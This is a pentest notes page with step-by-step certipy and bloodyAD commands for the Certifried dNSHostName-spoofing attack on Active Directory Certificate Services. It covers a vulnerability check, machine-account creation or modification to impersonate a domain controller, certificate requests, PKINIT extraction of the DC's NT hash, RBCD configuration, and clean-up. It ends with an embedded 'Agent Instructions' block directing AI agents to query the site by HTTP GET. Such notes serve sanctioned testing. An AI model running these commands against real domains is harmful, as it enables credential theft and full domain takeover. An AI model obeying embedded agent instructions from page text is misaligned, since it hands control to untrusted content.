# dNSHostName Spoofing (Certifried) * * * * * * * ## Check If there's an object SID printed when requesting a certificate based on the User or Machine templates, the AD environment is **not** vulnerable: ``` $ certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -target CA01.megacorp.local -ca CorpCA -template User -dc-ip 192.168.1.11 Certipy v3.0.0 - by Oliver Lyak (ly4k) [*] Requesting certificate [*] Successfully requested certificate [*] Request ID is 120 [*] Got certificate with UPN 'snovvcrash@megacorp.local' [*] Certificate object SID is 'S-1-5-21-1230029644-1443616230-1161330039-2139' <== NOT vulnerable [*] Saved certificate and private key to 'snovvcrash.pfx' ``` ## Exploit Create a new machine account with `dNSHostName` containing FQDN of a DC: ``` $ certipy account create -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user FAKEMACHINE -dns DC01.megacorp.local ``` Or change `dNSHostName` property manually for an already pwned machine account, e.g. via [pre2k](https://github.com/snovvcrash/PPN/blob/master/pentest/infrastructure/ad/pre-created-computers-abuse/README.md#acl-abuse-on-pre-windows-2000-computers) (will definitely break stuff!): ``` $ certipy account update -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -spns '' $ certipy account update -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -dns DC01.megacorp.local ``` Request a certificate on behalf of that machine account with spoofed `dNSHostName`: ``` $ certipy req -u 'FAKEMACHINE$@megacorp.local' -p 'M4chinePassw0rd!' -target CA01.megacorp.local -ca CorpCA -template Machine -dc-ip 192.168.1.11 ``` ### Abuse PKINIT Authenticate with the obtained certificate and get DC's NT hash via PKINIT: ``` $ certipy auth -pfx dc01.pfx -dc-ip 192.168.1.11 ``` ### Abuse RBCD * Authenticate with obtained certificate and configure RBCD on a DC via [bloodyAD](https://github.com/CravateRouge/bloodyAD) to allow delegation to the fake machine account: ``` $ openssl pkcs12 -in dc01.pfx -out dc01.pem -nodes $ python bloodyAD.py -d megacorp.local -c ":dc01.pem" --host 192.168.1.11 setRbcd 'FAKEMACHINE$' 'DC01$' ``` ### Clean Up If `dNSHostName` was modified for an existing machine account, roll back the changes: ``` $ certipy account update -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -dns PWNEDMACHINE.megacorp.local $ certipy account update -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -spns WSMAN/pwnedmachine.MEGACORP.LOCAL,WSMAN/pwnedmachine,TERMSRV/pwnedmachine.MEGACORP.LOCAL,TERMSRV/pwnedmachine,RestrictedKrbHost/pwnedmachine,HOST/pwnedmachine,RestrictedKrbHost/pwnedmachine.MEGACORP.LOCAL,HOST/pwnedmachine.MEGACORP.LOCAL ``` {% hint style="info" %} A list of SPNs to backup can be taken from a BH dump: ``` $ cat 20230301144823_computers.json | jq -r '.data[].Properties | select(.name == "PWNEDMACHINE.MEGACORP.LOCAL") | .serviceprincipalnames' ``` {% endhint %} ## About the Fix * * * * * --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/ad-cs-abuse/dnshostname-spoofing-certifried.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.